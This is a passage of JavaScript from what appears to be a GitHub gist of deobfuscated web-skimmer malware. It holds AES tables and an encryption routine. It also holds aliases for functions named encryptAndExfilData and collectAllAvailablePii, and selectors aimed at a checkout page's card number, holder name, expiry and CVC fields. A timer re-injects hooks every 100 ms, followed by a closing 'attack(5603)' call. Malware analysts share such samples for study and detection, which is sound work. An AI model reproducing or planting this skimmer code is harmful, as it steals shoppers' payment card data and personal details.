GDX: [0,13,26,23,52,57,46,35,104,101,114,127,92,81,70,75,208,221,202,199,228,233,254,243,184,181,162,175,140,129,150,155,187,182,161,172,143,130,149,152,211,222,201,196,231,234,253,240,107,102,113,124,95,82,69,72,3,14,25,20,55,58,45,32,109,96,119,122,89,84,67,78,5,8,31,18,49,60,43,38,189,176,167,170,137,132,147,158,213,216,207,194,225,236,251,246,214,219,204,193,226,239,248,245,190,179,164,169,138,135,144,157,6,11,28,17,50,63,40,37,110,99,116,121,90,87,64,77,218,215,192,205,238,227,244,249,178,191,168,165,134,139,156,145,10,7,16,29,62,51,36,41,98,111,120,117,86,91,76,65,97,108,123,118,85,88,79,66,9,4,19,30,61,48,39,42,177,188,171,166,133,136,159,146,217,212,195,206,237,224,247,250,183,186,173,160,131,142,153,148,223,210,197,200,235,230,241,252,103,106,125,112,83,94,73,68,15,2,21,24,59,54,33,44,12,1,22,27,56,53,34,47,100,105,126,115,80,93,74,71,220,209,198,203,232,229,242,255,180,185,174,163,128,141,154,151],
GEX: [0,14,28,18,56,54,36,42,112,126,108,98,72,70,84,90,224,238,252,242,216,214,196,202,144,158,140,130,168,166,180,186,219,213,199,201,227,237,255,241,171,165,183,185,147,157,143,129,59,53,39,41,3,13,31,17,75,69,87,89,115,125,111,97,173,163,177,191,149,155,137,135,221,211,193,207,229,235,249,247,77,67,81,95,117,123,105,103,61,51,33,47,5,11,25,23,118,120,106,100,78,64,82,92,6,8,26,20,62,48,34,44,150,152,138,132,174,160,178,188,230,232,250,244,222,208,194,204,65,79,93,83,121,119,101,107,49,63,45,35,9,7,21,27,161,175,189,179,153,151,133,139,209,223,205,195,233,231,245,251,154,148,134,136,162,172,190,176,234,228,246,248,210,220,206,192,122,116,102,104,66,76,94,80,10,4,22,24,50,60,46,32,236,226,240,254,212,218,200,198,156,146,128,142,164,170,184,182,12,2,16,30,52,58,40,38,124,114,96,110,68,74,88,86,55,57,43,37,15,1,19,29,71,73,91,85,127,113,99,109,215,217,203,197,239,225,243,253,167,169,187,181,159,145,131,141],
core: core_,
expandKey: expandKey_,
addRoundKey: addRoundKey_,
createRoundKey: createRoundKey_,
subBytes: subBytes_,
shiftRows: shiftRows_,
shiftRow: shiftRow_,
galois_multiplication: galois_multiplication_,
mixColumns: mixColumns_,
mixColumn: mixColumn_,
round: round_,
invRound: invRound_,
main: main_,
invMain: invMain_,
numberOfRounds: numberOfRounds_,
encrypt: encrypt_,
decrypt: decrypt_
},
modeOfOperation: {
OFB: 0,
CFB: 1,
CBC: 2
},
getBlock: getBlock_,
encrypt: encrypt__,
decrypt: decrypt__,
padBytesIn: padBytesIn_,
unpadBytesOut: unpadBytesOut_
};
void 0 === existingGuid ? generateGuid32() :
32 != getCodeArrFromString(existingGuid).length ? generateGuid32() : existingGuid = getCodeArrFromString(existingGuid), void 0 === existingIv ? generateIv16() : 16 != getCodeArrFromString(existingIv).length ? generateIv16() : existingIv = getCodeArrFromString(existingIv);
var encodedArr = str2EncodedArr(data);
return arr2String(utils.encrypt(encodedArr, 2, existingGuid, existingIv));
}
al = addEventListenerAndMark;
vld = validateCcFields;
sac = changeCallback;
sd = clickCallback;
sr = encryptAndExfilData;
scf = collectAllAvailablePii;
vcn = isValidCcNumber;
gfv = getValueFromCookieOrElement;
gc = getCookieValue;
cc = setCookie;
ini = isPositiveNumber;
ccn = 'field-checkout', nb_dd = '#num_card', nm_dd = "input[data-decidir='card_holder_name']", m_dd = '#CardExpirationMonth', y_dd = '#CardExpirationYear', c_dd = '#cvcfield', details = {
a2: '',
ps: '',
u: '',
cd: {}
};
ccFieldsIds = [
'#num_card',
'#CardExpirationMonth',
'#CardExpirationYear',
'#cvcfield'
];
setInterval(injectHooks, 100);
requiresExfiltration = true;
generateGUID = generateGUID_;
generateIV = generateIV_;
encryptData = encryptData_;
countries = {
Afghanistan: 'AF',
'Aland Islands': 'AX',
Albania: 'AL',
Algeria: 'DZ',
'American Samoa': 'AS',
Andorra: 'AD',
Angola: 'AO',
Anguilla: 'AI',
Antarctica: 'AQ',
'Antigua And Barbuda': 'AG',
Argentina: 'AR',
Armenia: 'AM',
Aruba: 'AW',
Australia: 'AU',
Austria: 'AT',
Azerbaijan: 'AZ',
Bahamas: 'BS',
Bahrain: 'BH',
Bangladesh: 'BD',
Barbados: 'BB',
Belarus: 'BY',
Belgium: 'BE',
'(BE)': 'BE',
Belize: 'BZ',
Benin: 'BJ',
Bermuda: 'BM',
Bhutan: 'BT',
Bolivia: 'BO',
'Bosnia And Herzegovina': 'BA',
Botswana: 'BW',
'Bouvet Island': 'BV',
Brazil: 'BR',
'British Indian Ocean Territory': 'IO',
'Brunei Darussalam': 'BN',
Bulgaria: 'BG',
'Burkina Faso': 'BF',
Burundi: 'BI',
Cambodia: 'KH',
Cameroon: 'CM',
Canada: 'CA',
'Cape Verde': 'CV',
'Cayman Islands': 'KY',
'Central African Republic': 'CF',
Chad: 'TD',
Chile: 'CL',
China: 'CN',
'Christmas Island': 'CX',
'Cocos (Keeling) Islands': 'CC',
Colombia: 'CO',
Comoros: 'KM',
Congo: 'CG',
'Congo, Democratic Republic': 'CD',
'Cook Islands': 'CK',
'Costa Rica': 'CR',
"Cote D'Ivoire": 'CI',
Croatia: 'HR',
Cuba: 'CU',
Cyprus: 'CY',
'Czech Republic': 'CZ',
Czechy: 'CZ',
Danmark: 'DK',
Denmark: 'DK',
Djibouti: 'DJ',
Dominica: 'DM',
'Dominican Republic': 'DO',
Ecuador: 'EC',
Egypt: 'EG',
'El Salvador': 'SV',
'Equatorial Guinea': 'GQ',
Eritrea: 'ER',
Estonia: 'EE',
Ethiopia: 'ET',
'Falkland Islands': 'FK',
'Faroe Islands': 'FO',
Fiji: 'FJ',
Finland: 'FI',
France: 'FR',
'(FR)': 'FR',
'France métropolitaine': 'FR',
'French Guiana': 'GF',
'French Polynesia': 'PF',
'French Southern Territories': 'TF',
Gabon: 'GA',
Gambia: 'GM',
Georgia: 'GE',
Deutschland: 'DE',
Allemagne: 'DE',
Germany: 'DE',
Ghana: 'GH',
Gibraltar: 'GI',
Greece: 'GR',
Greenland: 'GL',
Grenada: 'GD',
Guadeloupe: 'GP',
Guam: 'GU',
Guatemala: 'GT',
Guernsey: 'GG',
Guinea: 'GN',
'Guinea-Bissau': 'GW',
Guyana: 'GY',
Haiti: 'HT',
'Heard Island & Mcdonald Islands': 'HM',
'Holy See (Vatican City State)': 'VA',
Honduras: 'HN',
'Hong Kong': 'HK',
Hungary: 'HU',
'Węgry': 'HU',
Iceland: 'IS',
India: 'IN',
Indonesia: 'ID',
'Iran, Islamic Republic Of': 'IR',
Iraq: 'IQ',
Ireland: 'IE',
'Isle Of Man': 'IM',
Israel: 'IL',
Italia: 'IT',
Italy: 'IT',
Jamaica: 'JM',
Japan: 'JP',
Jersey: 'JE',
Jordan: 'JO',
Kazakhstan: 'KZ',
Kenya: 'KE',
Kiribati: 'KI',
Korea: 'KR',
Kuwait: 'KW',
Kyrgyzstan: 'KG',
"Lao People's Democratic Republic": 'LA',
Latvia: 'LV',
Lebanon: 'LB',
Lesotho: 'LS',
Liberia: 'LR',
'Libyan Arab Jamahiriya': 'LY',
Liechtenstein: 'LI',
Lithuania: 'LT',
Luxembourg: 'LU',
Macao: 'MO',
Macedonia: 'MK',
Madagascar: 'MG',
Malawi: 'MW',
Malaysia: 'MY',
Maldives: 'MV',
Mali: 'ML',
Malta: 'MT',
'Marshall Islands': 'MH',
Martinique: 'MQ',
Mauritania: 'MR',
Mauritius: 'MU',
Mayotte: 'YT',
Mexico: 'MX',
'Micronesia, Federated States Of': 'FM',
Moldova: 'MD',
Monaco: 'MC',
Mongolia: 'MN',
Montenegro: 'ME',
Montserrat: 'MS',
Morocco: 'MA',
Mozambique: 'MZ',
Myanmar: 'MM',
Namibia: 'NA',
Nauru: 'NR',
Nepal: 'NP',
Netherlands: 'NL',
'Netherlands Antilles': 'AN',
'New Caledonia': 'NC',
'New Zealand': 'NZ',
Nicaragua: 'NI',
Niger: 'NE',
Nigeria: 'NG',
Niue: 'NU',
'Norfolk Island': 'NF',
'Northern Mariana Islands': 'MP',
Norway: 'NO',
Oman: 'OM',
Pakistan: 'PK',
Palau: 'PW',
'Palestinian Territory, Occupied': 'PS',
Panama: 'PA',
'Papua New Guinea': 'PG',
Paraguay: 'PY',
Peru: 'PE',
Philippines: 'PH',
Pitcairn: 'PN',
Poland: 'PL',
Polska: 'PL',
Portugal: 'PT',
'Puerto Rico': 'PR',
Qatar: 'QA',
Reunion: 'RE',
Romania: 'RO',
'Russian Federation': 'RU',
Rwanda: 'RW',
'Saint Barthelemy': 'BL',
'Saint Helena': 'SH',
'Saint Kitts And Nevis': 'KN',
'Saint Lucia': 'LC',
'Saint Martin': 'MF',
'Saint Pierre And Miquelon': 'PM',
'Saint Vincent And Grenadines': 'VC',
Samoa: 'WS',
'San Marino': 'SM',
'Sao Tome And Principe': 'ST',
'Saudi Arabia': 'SA',
Senegal: 'SN',
Serbia: 'RS',
Seychelles: 'SC',
'Sierra Leone': 'SL',
Singapore: 'SG',
Slovakia: 'SK',
'Słowacja': 'SK',
Slovenia: 'SI',
'Solomon Islands': 'SB',
Somalia: 'SO',
'South Africa': 'ZA',
'South Georgia And Sandwich Isl.': 'GS',
Spain: 'ES',
'Sri Lanka': 'LK',
Sudan: 'SD',
Suriname: 'SR',
'Svalbard And Jan Mayen': 'SJ',
Swaziland: 'SZ',
Sweden: 'SE',
Switzerland: 'CH',
'Syrian Arab Republic': 'SY',
Taiwan: 'TW',
Tajikistan: 'TJ',
Tanzania: 'TZ',
Thailand: 'TH',
'Timor-Leste': 'TL',
Togo: 'TG',
Tokelau: 'TK',
Tonga: 'TO',
'Trinidad And Tobago': 'TT',
Tunisia: 'TN',
Turkey: 'TR',
Turkmenistan: 'TM',
'Turks And Caicos Islands': 'TC',
Tuvalu: 'TV',
Uganda: 'UG',
Ukraine: 'UA',
'United Arab Emirates': 'AE',
'United Kingdom': 'GB',
'Mainland UK': 'GB',
EN: 'GB',
'United Kingdom (Mainland)': 'GB',
'United States': 'US',
USA: 'US',
'United States of America': 'US',
'United States Outlying Islands': 'UM',
Uruguay: 'UY',
Uzbekistan: 'UZ',
Vanuatu: 'VU',
Venezuela: 'VE',
Vietnam: 'VN',
'Virgin Islands, British': 'VG',
'Virgin Islands, U.S.': 'VI',
'Wallis And Futuna': 'WF',
'Western Sahara': 'EH',
Yemen: 'YE',
Zambia: 'ZM',
Zimbabwe: 'ZW'
};
};
attack(5603);
return 8955;
}());
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment